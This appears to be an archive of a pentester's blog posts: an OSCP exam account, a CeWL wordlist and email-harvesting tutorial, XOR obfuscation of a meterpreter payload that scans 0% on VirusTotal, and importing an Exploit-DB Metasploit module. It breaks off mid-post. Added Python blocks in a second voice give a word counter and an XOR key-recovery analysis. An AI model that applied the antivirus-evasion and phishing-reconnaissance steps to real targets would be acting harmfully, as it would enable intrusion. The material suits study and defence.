Now, for my exam story. I thought I had scheduled my exam for Friday, Sept 30th at 5am. When I woke up to take the exam I never got the email, so I contacted support. They had no record of my registration and, even though I was frustrated, I scheduled my ACTUAL exam for October 3rd at noon. I spent the weekend playing around with virtual machines from VulnHub just to whet my appetite for the OSCP exam. Monday comes around and I get up, get ready, and at noon I get the exam email with my connection details. I spun up my PWK virtual machine and it would not connect to the internet. WHAT. I tried to configure the virtual machine adapters and it wasn't working. So, after 15 minutes, I got my laptop, which was conveniently also running Kali Linux, and I was able to connect to the exam network and start my exam. I looked at the point values for the machines and started with the lowest-valued machine to get in the swing of things. I was able to exploit the first machine in about an hour. BOOM 1/5. I then moved on to the next machine and after about three hours I got the second machine completely. BOOM 2/5. I worked on the third box and after another three hours or so, I got the next box. BOOM 3/5. I was feeling really good but I didn't want to get cocky or disheartened; I wanted to maintain a level, calm, focused attitude. So, at this point, it's about 7-8pm and I continued on the fourth and fifth machines and by 2am I had a low-privilege shell on the fourth machine. I slept from 2am to 6am, got up, took a swig of Mountain Dew, brewed some coffee and got back to work. Well, little did I know, my laptop had updated and crashed and would not boot into the graphical UI. So I switched back to my desktop, spun up a new Kali virtual machine and was able to continue the exam. I had a low-privilege shell on the fourth machine and I could not figure out how to escalate. I searched and searched until I finally was going through the output of a tool and saw something I had missed before. It basically said, in a very inconspicuous way, "you might want to check this out?" Well THANK YOU, output. Way to not draw attention to something I'm looking for. Anyway, I was able to use this to finally escalate my privileges on the fourth box and get proof.txt. Thus, I had four out of five boxes completely compromised with one hour left in the exam. I tinkered with the last box and found a vulnerability but could not even get a low-privilege shell. 4/5. Not bad at all. According to the scores I believed I had passed, but ultimately Offsec had the final say. I contacted the admins and told them of my technical difficulties and they were willing to work with me, but I was able to get the screenshots and data off my laptop using recovery mode and then I wrote up the report.<br />
<br />
Well, today I got the email! "We are happy to inform you..." I had successfully completed the exam and I am officially OSCP certified. I laughed and cheered and told my family and friends that I had passed that 'super hard, 24-hour, hacker exam'. The best part about this exam was the hard work. This exam meant so much to me because of how much effort I put into this course and exam. I spent over 100 hours learning and practicing this material. I don't regret one single minute of it and I can't wait to start the Cracking The Perimeter course and get the OSCE next.Austinhttp://www.blogger.com/profile/01968094133955654942noreply@blogger.com0tag:blogger.com,1999:blog-918525977206186619.post-59225164974015414652016-09-28T21:47:00.001-04:002016-09-28T21:47:50.769-04:00A Pretty Cewl PostHello everyone,<br />
<br />
I have been MIA for quite a while, so as a welcome-back post let's talk about a CEWL tool. CeWL (Custom Word List generator) is a wordlist generator that comes standard with Kali. The idea is to crawl a target website and build a wordlist from the words it finds, which can then be used for cracking or guessing passwords. In addition, it can harvest email addresses to be used as usernames. So, let's walk through this tool!<br />
<br />
Before we start, this post is for educational purposes only and I, as the author, do not condone the usage of this tool for any malicious purposes. In addition, this post does not reflect the views of any of the author's past, present, or future employers. <br />
<br />
The basic usage of Cewl looks like this:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3VKNYVx5ceQICU1RaBgWhhRvzifTbSFVuWQF5nX24G3MmqBIJu8y5La6SwYdq8TfjIXmbH1uyHSxesaUWVAriz6kobwJY6D_Zys18fUSXIVzAA_j7aupgQV1ls9tsNy885ZCfcU8pTNpI/s1600/cewl1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3VKNYVx5ceQICU1RaBgWhhRvzifTbSFVuWQF5nX24G3MmqBIJu8y5La6SwYdq8TfjIXmbH1uyHSxesaUWVAriz6kobwJY6D_Zys18fUSXIVzAA_j7aupgQV1ls9tsNy885ZCfcU8pTNpI/s320/cewl1.png" width="294" /></a></div>
Just from pointing CeWL at www.google.com, it produced a list of words that could plausibly turn up in passwords. So what else can we do? We can count how often each word appears and rank the most commonly found words first.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjnv_-FN4RCFfu-g5mJxjTlFPSEFgLxXCk1Iyr25vGy0VQ93Imj-cekdc3AQpvyZclh72Fd3LIdRqdNqeFElLcJY5roa8LgH63zyILhppf9JrKprgBmmq51uVOsgA_gU8YikTLPqNsEtYur/s1600/cewl2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjnv_-FN4RCFfu-g5mJxjTlFPSEFgLxXCk1Iyr25vGy0VQ93Imj-cekdc3AQpvyZclh72Fd3LIdRqdNqeFElLcJY5roa8LgH63zyILhppf9JrKprgBmmq51uVOsgA_gU8YikTLPqNsEtYur/s320/cewl2.png" width="294" /></a></div>
Let's see what CeWL can really do: count the words, write the results to a file, find any email addresses lying around, and parse the metadata of any documents it finds, this time for www.sans.org (Google didn't return any interesting results...lame).<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg1Kn8Gyrlo-DN3CHwF3plUB0nIL95e6tdHSaOpkHod6U6pN6uK9biSuoZ-kt4ywPyzV6D9EqSiVGLA9ue-ZnEQbGD_VTcmv73mRKlQBlmTjSjY2FCuei6Mp9yTvcx_b8IN2gshoeCR5uvs/s1600/cewl4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg1Kn8Gyrlo-DN3CHwF3plUB0nIL95e6tdHSaOpkHod6U6pN6uK9biSuoZ-kt4ywPyzV6D9EqSiVGLA9ue-ZnEQbGD_VTcmv73mRKlQBlmTjSjY2FCuei6Mp9yTvcx_b8IN2gshoeCR5uvs/s320/cewl4.png" width="294" /></a></div>
As you can see, I had to try a couple of times to get a good example to show you, but from this output we can see some keywords usable as password candidates (not very good ones in my opinion, although there are better ones further down the list). We also got some email addresses; we can use these to seed reconnaissance searches, or as 'from' addresses for a phishing campaign. Lastly, the document metadata tells us that someone named 'Lynn' worked on some of the documents CeWL was able to find.<br />
<br />
Reconnaissance is not a sexy part of hacking, but the more information we can gather, the better campaign we will have. When gathering information make sure you are professional; some information, once gathered and correlated, can be quite sensitive to people, companies, or other concerned parties, and a crawl is still traffic the target's web server sees, so only point the tool at sites you are authorized to test. <br />
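To make concrete what CeWL is doing under the hood, here is a small Python 3 stand-in I wrote for this post; it is not CeWL's own code and not the author's. It covers the offline part of the job: extract the visible words from a page, count them the way CeWL's -c option does, rank them, and harvest email addresses the way -e does. Instead of a live crawl it works on a constructed sample page embedded inline, and the minimum word length defaults to 3, which matches CeWL's default for -m.

```python
import re
from collections import Counter
from html.parser import HTMLParser

# Constructed sample page standing in for a crawled target (not real site content).
SAMPLE_HTML = """<html><head><title>Acme Widgets - Quarterly Update</title></head>
<body><h1>Acme Widgets</h1>
<p>Contact sales@acme-widgets.example or lynn.carter@acme-widgets.example.</p>
<p>Our flagship product, the Widgetron 3000, ships from the Springfield plant.
Widgetron owners love the Widgetron.</p>
<script>var ignored = "script bodies are not page text";</script>
<p>Internal project codename: Bluebird. Go Bluebird!</p>
</body></html>"""

WORD_RE = re.compile(r"[A-Za-z][A-Za-z0-9'-]*")
EMAIL_RE = re.compile(r"[\w.+-]+@[\w-]+(?:\.[\w-]+)+")


class _TextExtractor(HTMLParser):
    """Collect visible text, skipping script and style bodies."""

    def __init__(self):
        super().__init__()
        self.parts = []
        self._skip = 0

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self._skip += 1

    def handle_endtag(self, tag):
        if tag in ("script", "style") and self._skip:
            self._skip -= 1

    def handle_data(self, data):
        if not self._skip:
            self.parts.append(data)


def visible_text(html: str) -> str:
    parser = _TextExtractor()
    parser.feed(html)
    parser.close()
    return " ".join(parser.parts)


def word_counts(html: str, min_len: int = 3) -> Counter:
    """Frequency of every visible word of at least min_len characters
    (3 is CeWL's default minimum word length)."""
    return Counter(w for w in WORD_RE.findall(visible_text(html)) if len(w) >= min_len)


def emails(html: str) -> list:
    """Email addresses anywhere in the markup (mailto links included), deduplicated."""
    return sorted(set(EMAIL_RE.findall(html)))


def wordlist(html: str, min_len: int = 3) -> list:
    """Candidate words, most frequent first, ties alphabetical: the ordering
    that makes a ranked list worth feeding to a cracker before a generic one."""
    counts = word_counts(html, min_len)
    return [w for w, _ in sorted(counts.items(), key=lambda kv: (-kv[1], kv[0]))]


if __name__ == "__main__":
    for word, n in word_counts(SAMPLE_HTML).most_common(5):
        print(f"{n:3d} {word}")
    print("emails:", ", ".join(emails(SAMPLE_HTML)))
```

The ranking is the part worth keeping in mind when you use the real tool: product names and project codenames (here "Widgetron" and "Bluebird") float to the top precisely because a site repeats them, and those are the words people reuse in passwords. Case is preserved on purpose, since a cracker's rules will generate the variants.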
<br />
<br />Austinhttp://www.blogger.com/profile/01968094133955654942noreply@blogger.com0tag:blogger.com,1999:blog-918525977206186619.post-64886428574545208922016-07-18T21:57:00.001-04:002016-10-10T15:01:11.864-04:00Maybe it's...XOR obfuscation-elineWhile I was spending some quality time with Metasploit and contemplating how I would conduct a pen test using obfuscated tools, I thought, "What is a simple way to obfuscate tools without using the Metasploit framework, msfvenom, or shikata_ga_nai?" Python script! A simple XOR might prevent a tool from being caught in a pinch. So, I wrote up a script and published it <span style="color: lime;"><a href="https://github.com/Quantumite/xor_obfuscator" target="_blank">here</a></span> along with some of my results after testing.<br />
<br />
So, first I wanted to make sure the script worked: I ran test.txt through my Python script with 'python xor_obfuscator.py -i test.txt -p john' and left the output file as the default value. Then, to double-check, I ran 'python xor_obfuscator.py -i out.file -p john -o new.test.txt' and verified with md5sum that the round trip reproduced the original.<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjjpdlTFJJfvLqCAHh1O0XZbzJ3BXLtohk_J-vZ6PHU3RsZ6Ra0W2CFnfpbwYP-RdvMHMQN4lTb1HAZLAJjwUDTAQMfa10wKR5H070MmjW0ea9q8BGS0LlrGw-sY2ZRf4h79e7p3bouA_Rp/s1600/Screenshot+from+2016-07-18+21%253A14%253A32.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="218" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjjpdlTFJJfvLqCAHh1O0XZbzJ3BXLtohk_J-vZ6PHU3RsZ6Ra0W2CFnfpbwYP-RdvMHMQN4lTb1HAZLAJjwUDTAQMfa10wKR5H070MmjW0ea9q8BGS0LlrGw-sY2ZRf4h79e7p3bouA_Rp/s320/Screenshot+from+2016-07-18+21%253A14%253A32.png" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj6G2x71NLHjH9o12KtWcovi9ySIooWUN88uQNg7r8sFjZXdBi5nyg2fZX0hJbhGCG80ThNZblu2JMuRTJNTGB0pp52HJd7BLhF0B0qDeU__jN2XZEJ-BtF9BDINwD6YcanPYoxD-WXwYXu/s1600/Screenshot+from+2016-07-18+21%253A14%253A56.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="218" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj6G2x71NLHjH9o12KtWcovi9ySIooWUN88uQNg7r8sFjZXdBi5nyg2fZX0hJbhGCG80ThNZblu2JMuRTJNTGB0pp52HJd7BLhF0B0qDeU__jN2XZEJ-BtF9BDINwD6YcanPYoxD-WXwYXu/s320/Screenshot+from+2016-07-18+21%253A14%253A56.png" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjMa1m1kYkRKzM7gPOOHy8YH2APhHtO0A5ogivysLGEChs_9nc51f0KsdH4oIgLu1_rOEwArRt6hsPwG5I6vwkjiHP5r5UjSsWkcnbF64mFRbLY2Ryc-HXXba0fnSpPEEsyIXCgP5nwpeI9/s1600/Screenshot+from+2016-07-18+21%253A15%253A35.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="218" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjMa1m1kYkRKzM7gPOOHy8YH2APhHtO0A5ogivysLGEChs_9nc51f0KsdH4oIgLu1_rOEwArRt6hsPwG5I6vwkjiHP5r5UjSsWkcnbF64mFRbLY2Ryc-HXXba0fnSpPEEsyIXCgP5nwpeI9/s320/Screenshot+from+2016-07-18+21%253A15%253A35.png" width="320" /></a></div>
As we can see, 'test.txt' and 'new.test.txt' have the same md5sum, but after obfuscating with the password 'john' the md5sum changes, as it would for any change to the bytes; a different hash only tells us the file was transformed, not that anything is hidden. Now, let's try this with a meterpreter shell.<br />
<br />
We're going to use msfvenom to create a simple meterpreter executable and run it through VirusTotal to see whether the engines still detect it. Keep in mind that anything uploaded to VirusTotal is shared with the AV vendors, so only do this with throwaway payloads, never with one you intend to use on an engagement.<br />
<br />
Here we've created the meterpreter.exe and the hidden.exe.obf.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhcnLriFw505OA-trr-U8epztnJdX-KhVa0YiNXWZJ1P-pwzHyM-G1H_Q1O67geeeOhF7CFaG9narc1F2BRW8qf9fqqZeQKxi1wWDAfPAbBrnJSUlRmpK60zOycJjqdrQZwxqKbSsKV07gu/s1600/Screenshot+from+2016-07-18+21%253A36%253A45.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="218" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhcnLriFw505OA-trr-U8epztnJdX-KhVa0YiNXWZJ1P-pwzHyM-G1H_Q1O67geeeOhF7CFaG9narc1F2BRW8qf9fqqZeQKxi1wWDAfPAbBrnJSUlRmpK60zOycJjqdrQZwxqKbSsKV07gu/s320/Screenshot+from+2016-07-18+21%253A36%253A45.png" width="320" /></a></div>
<br />
<br />
Interestingly enough, the VirusTotal engines did not do a great job of detecting even the plain meterpreter payload, but some of them did flag meterpreter.exe.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhWszlgECMKOR43DFC61AGIf4Gz1NsX6X6fZz4SypGtKZYgC98VkixZBW-skb13oM1DqE-arDa3EP2IucTEoFtrvBnHKET3mTw8UnVwaQVfLz4NDvAKYAzIP-C_tacEnvbS_oNigbk9R2ZQ/s1600/Screenshot+from+2016-07-18+21%253A41%253A52.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="173" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhWszlgECMKOR43DFC61AGIf4Gz1NsX6X6fZz4SypGtKZYgC98VkixZBW-skb13oM1DqE-arDa3EP2IucTEoFtrvBnHKET3mTw8UnVwaQVfLz4NDvAKYAzIP-C_tacEnvbS_oNigbk9R2ZQ/s320/Screenshot+from+2016-07-18+21%253A41%253A52.png" width="320" /></a></div>
<br />
Now, after we scan the hidden.exe.obf file...<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEji-58s5hjs-r6KV_jH0-OUbtWvQsRSzyoZO-inlc8XSXQNW76CpDJ8SEF7C3pQ_Ht0oMdCqX9OUPmJfPBdMASgBDfx-CRNrhGoZ5hOLpRZdAcnRoJisCv0r_0ZFQM_nHnGVidCKcLMqiIJ/s1600/Screenshot+from+2016-07-18+21%253A42%253A41.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="173" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEji-58s5hjs-r6KV_jH0-OUbtWvQsRSzyoZO-inlc8XSXQNW76CpDJ8SEF7C3pQ_Ht0oMdCqX9OUPmJfPBdMASgBDfx-CRNrhGoZ5hOLpRZdAcnRoJisCv0r_0ZFQM_nHnGVidCKcLMqiIJ/s320/Screenshot+from+2016-07-18+21%253A42%253A41.png" width="320" /></a></div>
0% detection! This makes sense: the file no longer resembles an executable, so the static signatures that matched meterpreter.exe have nothing to match, but it also cannot be executed as-is. You could place it on a target and, according to this scan, it would not be detected, but the scan says nothing about the moment the file is decoded and run, which is what on-access and behavioural scanning actually watch.<br />
<br />
This is not a sophisticated method for hiding executables, but it can get a file past simple signature-based antivirus, firewall, and intrusion detection checks while it sits on disk or crosses the network. Do with it what you will!<br />
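Why the fresh hash and the clean scan say so little: the code below is an added Python 3 example of my own, not the author's xor_obfuscator.py, implementing the repeating-key XOR the post describes (the password's bytes cycled across the whole file) together with the attack a defender or analyst would run against it. The file is a constructed stand-in for a PE image rather than a real binary, built on two facts about real ones: the DOS header starts with "MZ", and nearly every linker puts the string "This program cannot be run in DOS mode." at offset 0x4E. The password john is the one used above. Because the key repeats and those plaintext bytes are predictable, dragging the known string across the blob recovers the key without ever seeing the original file.

```python
# Constructed stand-in for a Windows PE image (not a real binary).
DOS_STUB_MSG = b"This program cannot be run in DOS mode."
FAKE_PE = (
    b"MZ\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xff\xff\x00\x00"
    + b"\x00" * 0x30                                                # rest of the DOS header
    + b"\x0e\x1f\xba\x0e\x00\xb4\x09\xcd\x21\xb8\x01\x4c\xcd\x21"  # DOS stub code
    + DOS_STUB_MSG + b"\r\r\n$"
    + bytes(range(256)) * 2                                         # filler standing in for the image
)
STUB_OFFSET = 0x4E  # where the stub message lands in the constructed image


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR, the transform the post applies. Symmetric: the same
    call with the same key both encodes and decodes."""
    if not key:
        raise ValueError("key must not be empty")
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def key_from_crib(blob: bytes, crib: bytes, offset: int, key_len: int):
    """Key bytes implied by assuming `crib` is the plaintext at `offset` under a
    key of length key_len. Returns None as soon as two crib positions that share
    a key slot disagree about that slot's value, or if a slot is never covered."""
    slots = [None] * key_len
    for i, c in enumerate(crib):
        k = blob[offset + i] ^ c
        s = (offset + i) % key_len
        if slots[s] is None:
            slots[s] = k
        elif slots[s] != k:
            return None
    return None if None in slots else bytes(slots)


def recover_key(blob: bytes, crib: bytes = DOS_STUB_MSG, max_key_len: int = 16):
    """Crib-drag `crib` across the blob for each candidate key length, shortest
    first. A candidate wins when it is self-consistent and also decodes the first
    two bytes of the blob to "MZ". Returns (key, crib_offset) or None."""
    for key_len in range(1, max_key_len + 1):
        for offset in range(len(blob) - len(crib) + 1):
            key = key_from_crib(blob, crib, offset, key_len)
            if key is not None and xor_bytes(blob[:2], key) == b"MZ":
                return key, offset
    return None


if __name__ == "__main__":
    hidden = xor_bytes(FAKE_PE, b"john")      # what the post calls hidden.exe.obf
    print("recovered:", recover_key(hidden))  # (b'john', 78)
```

Run as-is it encodes the fake image with john and prints the recovered key and the offset where the crib was found. The point for the post's use case: the hash changed and the static scan came back clean, yet the key is a few bytes of known plaintext away for anyone who picks the file up, and the decoding step your loader performs is one an analyst can perform just as easily. A longer random password (the author's 7/19 edit adds one) only raises the key length the crib drag has to try; it does not remove the known plaintext.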
<br />
--EDIT-- 7/19/2016<br />
<br />
I was able to add random password creation and execution via temporary files to my Python script. Check out the updates at the same link as above, but here it is again: https://github.com/Quantumite/xor_obfuscator/ Note that decoding to a temporary file puts the original executable back on disk in the clear, exactly where on-access scanning looks, and a random key only changes the hash of the encoded file, not the bytes that eventually run.<br />
<br />
<br />
Austinhttp://www.blogger.com/profile/01968094133955654942noreply@blogger.com0tag:blogger.com,1999:blog-918525977206186619.post-49789024480017659782016-06-15T21:53:00.000-04:002016-06-15T21:53:15.570-04:00It's a public metasploit module and I want it now!Good evening! Long time no chat, I've got a great technical article coming up that will be useful to anyone that uses Metasploit!<br />
<br />
We are going to walk through adding new modules to the Metasploit framework. Not going to lie, I stole some of the knowledge and information from other walkthroughs on the internet, so I'm going to cite the main ones here and then walk through it myself.<br />
<br />
Thanks to:<br />
<ul>
<li><a href="https://github.com/rapid7/metasploit-framework/wiki/Loading-External-Module"><cite class="_Rm">https://github.com/rapid7/metasploit-framework/wiki/Loading-External-Module</cite></a></li>
<li><a href="http://www.kalitutorials.net/2014/06/add-new-exploits-to-metasploit-from.html"><cite class="_Rm"><cite class="_Rm">www.kalitutorials.net/2014/06/add-new-exploits-to-metasploit-from.html</cite></cite></a></li>
<li><cite class="_Rm"><cite class="_Rm"><a href="https://informationtreasure.wordpress.com/2014/07/25/add-new-exploits-to-metasploit-from-exploit-db/">https://informationtreasure.wordpress.com/2014/07/25/add-new-exploits-to-metasploit-from-exploit-db/</a> </cite></cite></li>
</ul>
Step 1: Find an exploit you'd like to add to Metasploit! Typically this is because you haven't updated Metasploit for a while (msfupdate, fyi), or there is a brand new exploit released on Exploit-DB and you GOTTA, GOTTA HAVE IT!<br />
<br />
For this post I decided to add the new Apache Continuum Arbitrary Command Execution exploit to metasploit (<a href="https://www.exploit-db.com/exploits/39945/">https://www.exploit-db.com/exploits/39945/</a>).<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbg3lBK5Jd2-hfnyqL8v1lAhEJT7lITpnOIh0hgqcD2MgHfj2fsUl-SUIUCq7uFo8valxDgshRqcFdetfY5U_I3Q5fvPI-qS63NgOTrerdihGhIZXDRmIPGvttCnaRgiEmHWLge5uWAsok/s1600/Screenshot+from+2016-06-15+20%253A09%253A59.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="179" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbg3lBK5Jd2-hfnyqL8v1lAhEJT7lITpnOIh0hgqcD2MgHfj2fsUl-SUIUCq7uFo8valxDgshRqcFdetfY5U_I3Q5fvPI-qS63NgOTrerdihGhIZXDRmIPGvttCnaRgiEmHWLge5uWAsok/s320/Screenshot+from+2016-06-15+20%253A09%253A59.png" width="320" /></a></div>
Step 2: Download the Ruby script. Click the source button, or the raw button; somehow get the text you see on the screen into a .rb file on your computer. I still recommend clicking the source button.<br />
Step 3: Copy or move that file into the hidden msf directory in your home directory. Mine was ~/.msf5/ because I had just updated Metasploit; the other blogs above reference ~/.msf4/, but the correct answer is whichever hidden folder your installed Metasploit actually uses (include '-a' in your ls command so you can see the hidden folders). Then mkdir the subfolders under it: I made ~/.msf5/exploits/apache/ to store the new exploit.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhIohu_SDc76VY_oOzTAxHhk08LVrIROpNvmgn1psb2HAU_r4muarnfAwFCqM0xIKWIiwp4jTkZPeR_NIwWj0zXshgbJ8XOpAzA2VnCPCHY1ino817A1FMuISGTP6kdqU4GWISTg6e3pYSu/s1600/Screenshot+from+2016-06-15+20%253A08%253A36.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="179" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhIohu_SDc76VY_oOzTAxHhk08LVrIROpNvmgn1psb2HAU_r4muarnfAwFCqM0xIKWIiwp4jTkZPeR_NIwWj0zXshgbJ8XOpAzA2VnCPCHY1ino817A1FMuISGTP6kdqU4GWISTg6e3pYSu/s320/Screenshot+from+2016-06-15+20%253A08%253A36.png" width="320" /> </a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Note: Right below the hidden msf folder you need to follow Metasploit's naming convention for module types (exploits, auxiliary, payloads, etc.), but below that you can use whatever folders you want so you can easily find the exploit while using Metasploit. The Loading-External-Module wiki page cited above documents the user module root as ~/.msf4/modules/&lt;type&gt;/..., so if your framework does not pick the module up where you put it, try that layout and run reload_all in msfconsole.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Step 4: Here I actually had issues :( When I put the Ruby script into the above directory, Metasploit was very unhappy due to "Missing compatible Metasploit&lt;major_version&gt; class constant". To fix this, I grabbed an exploit that I knew Metasploit accepted and manually diffed the two files to find the discrepancies. Ultimately, it came down to this...</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjDO5jP7bIawHjp51yREQIL3S_tLzX9yFHzCM_htdNUySQayQrR3-4Qur5m5HZcWkedLIjEt8XCpeeOLPLvUrR1Jz2zvMKWo_SLp1F3PliZM-Lg_S_UyTAIbAeRi1acxvyCVBZmi0kvrbza/s1600/Screenshot+from+2016-06-15+20%253A33%253A30.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="179" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjDO5jP7bIawHjp51yREQIL3S_tLzX9yFHzCM_htdNUySQayQrR3-4Qur5m5HZcWkedLIjEt8XCpeeOLPLvUrR1Jz2zvMKWo_SLp1F3PliZM-Lg_S_UyTAIbAeRi1acxvyCVBZmi0kvrbza/s320/Screenshot+from+2016-06-15+20%253A33%253A30.png" width="320" /></a></div>
I had to change MetasploitModule to Metasploit3 and add require 'msf/core' (single quotes, not double). Then Metasploit finally accepted my new script as one of its own (d'awww). Which direction this rename goes depends on the framework you have installed: the loader error names the class constant it expects, so match that. Modules written for newer framework versions declare MetasploitModule (which is what this Exploit-DB script used), while older installs like mine wanted Metasploit3 (or Metasploit4) plus the explicit require 'msf/core' line, so on a current framework you may need the opposite change or none at all.<br />
<br />
Step 5: Confirm the addition of the new script...<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjUzvI4ZjYx_DrA7Mrdvod3yl4u0rxj1V6B-2EFELI91ZTdAaFmD9PMIR_YXtVEfsNWtqG5ZsBWn4EaCZrTuKChs095Ld_UNZEDOcFSC7ap3R-VGvkD1Za0bVsfVsltwUSCF4xRAZ4Q6O3J/s1600/Screenshot+from+2016-06-15+20%253A11%253A06.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="179" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjUzvI4ZjYx_DrA7Mrdvod3yl4u0rxj1V6B-2EFELI91ZTdAaFmD9PMIR_YXtVEfsNWtqG5ZsBWn4EaCZrTuKChs095Ld_UNZEDOcFSC7ap3R-VGvkD1Za0bVsfVsltwUSCF4xRAZ4Q6O3J/s320/Screenshot+from+2016-06-15+20%253A11%253A06.png" width="320" /></a></div>
<br />
<br />
<br />
<br />
<br />
OK, we started with 1517 exploits available and after adding our new one we have...<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh_oi93R1hcN0Xh1Ki-qGMej5d6NXwF_Pb_SFRF4RRCVsnlFgbq51oDZGAEE0qH92neIVVpPVe7-OfrqcqPeYFpGMVaOdDUJt_Ny9iNKg7oghWNE6AyAQMHlBdPXeLnhc5HZs4wtf3JKgX4/s1600/Screenshot+from+2016-06-15+21%253A09%253A45.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="179" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh_oi93R1hcN0Xh1Ki-qGMej5d6NXwF_Pb_SFRF4RRCVsnlFgbq51oDZGAEE0qH92neIVVpPVe7-OfrqcqPeYFpGMVaOdDUJt_Ny9iNKg7oghWNE6AyAQMHlBdPXeLnhc5HZs4wtf3JKgX4/s320/Screenshot+from+2016-06-15+21%253A09%253A45.png" width="320" /></a></div>
1518!! WHOOOOHOOOOO!!<br />
<br />
Step 6: Confirm you can load and run the script using msfconsole (or whichever Metasploit interface you prefer)<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiAkpkWr8v61NOkOdN9MrgS4QSYFvfhMv5E2etIqO2GnWOnTtGMLCV8MO_bqbhlkbjNyho3MJLaTdRF_9RTmCWfe-o1xFXPo7vg7IimKBsCmy1ef4MZbDvnhE5LZG9YXk5xKqvhBM95JgCH/s1600/Screenshot+from+2016-06-15+20%253A33%253A12.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="179" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiAkpkWr8v61NOkOdN9MrgS4QSYFvfhMv5E2etIqO2GnWOnTtGMLCV8MO_bqbhlkbjNyho3MJLaTdRF_9RTmCWfe-o1xFXPo7vg7IimKBsCmy1ef4MZbDvnhE5LZG9YXk5xKqvhBM95JgCH/s320/Screenshot+from+2016-06-15+20%253A33%253A12.png" width="320" /></a></div>
<br />
<br />
<br />
<br />
<br />
So far so good. Now, beyond the scope of this blog post, I set up Apache Continuum; let's see if the exploit works...*DUN DUN DUNNNNN*<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
